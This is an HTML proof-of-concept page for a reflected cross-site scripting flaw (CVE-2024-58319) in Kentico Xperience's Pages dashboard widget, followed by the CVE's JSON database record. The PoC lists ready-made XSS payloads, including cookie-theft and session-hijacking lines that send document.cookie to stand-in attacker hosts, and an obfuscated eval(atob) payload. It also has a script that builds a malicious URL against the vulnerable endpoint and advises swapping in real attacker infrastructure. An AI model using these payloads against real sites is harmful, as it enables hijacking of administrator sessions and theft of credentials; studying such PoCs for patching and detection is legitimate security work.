CVE-2024-58319

<!-- CVE-2024-58319 PoC - Reflected XSS in Kentico Xperience Pages Dashboard Widget --> <!-- Target: Kentico Xperience Pages dashboard widget configuration dialog --> <!-- This PoC demonstrates the reflected XSS vulnerability --> <!DOCTYPE html> <html> <head> <title>CVE-2024-58319 PoC</title> </head> <body> <h2>CVE-2024-58319 - Kentico Xperience Reflected XSS PoC</h2> <!-- Attack Scenario: 1. Attacker crafts a malicious URL containing XSS payload 2. Attacker tricks administrator into clicking the link 3. Malicious JavaScript executes in administrator's browser --> <h3>Malicious URL:</h3> <pre id="malicious-url"></pre> <h3>XSS Payloads:</h3> <ul> <li>Basic: <code>" onfocus="alert(document.domain)" autofocus</code></li> <li>Cookie Theft: <code><script>fetch('https://attacker.com/steal?c='+document.cookie)</script></code></li> <li>Event Handler: <code><img src=x onerror=alert(document.cookie)></code></li> <li>DOM Manipulation: <code><svg/onload=eval(atob('YWxlcnQoJ1hTUyBwb2MgdXNlZCcpOw=='))></code></li> </ul> <h3>Proof of Concept URL:</h3> <button onclick="generatePOC()">Generate PoC URL</button> <br><br> <a id="poc-link" href="#" target="_blank">Click here to test (simulated)</a> <script> // Simulate PoC URL construction function generatePOC() { // Kentico Xperience typical URL patterns var baseUrl = window.location.origin + "/CMSPages/DashboardWidgetConfig.aspx"; var xssPayload = '<script>alert("XSS CVE-2024-58319")</script>'; var maliciousUrl = baseUrl + '?widgetId=test&config=' + encodeURIComponent(xssPayload); document.getElementById('malicious-url').textContent = maliciousUrl; document.getElementById('poc-link').href = maliciousUrl; console.log('PoC URL Generated: ' + maliciousUrl); console.log('Note: Actual exploitation requires valid Kentico Xperience installation'); } // Cookie stealing payload var stealCookiePayload = "<script>fetch('https://attacker-controlled-site.com/log?cookie='+btoa(document.cookie))</script>"; // Session hijacking payload var sessionHijackPayload = "<img src=x onerror=\"fetch('https://attacker.com/steal?session='+document.cookie)\">"; </script> <!-- Notes for security researchers: 1. Replace 'attacker-controlled-site.com' with actual attacker infrastructure 2. URL encode all special characters properly 3. Test in authorized penetration testing environment only 4. Verify vulnerability exists before reporting --> </body> </html>

{"cve": {"id": "CVE-2024-58319", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.780", "lastModified": "2025-12-27T17:15:46.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in administrative users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.160", "matchCriteriaId": "9C72165F-2961-48F8-AC6E-337C322F3606"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-pages-dashboard-widget-reflected-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}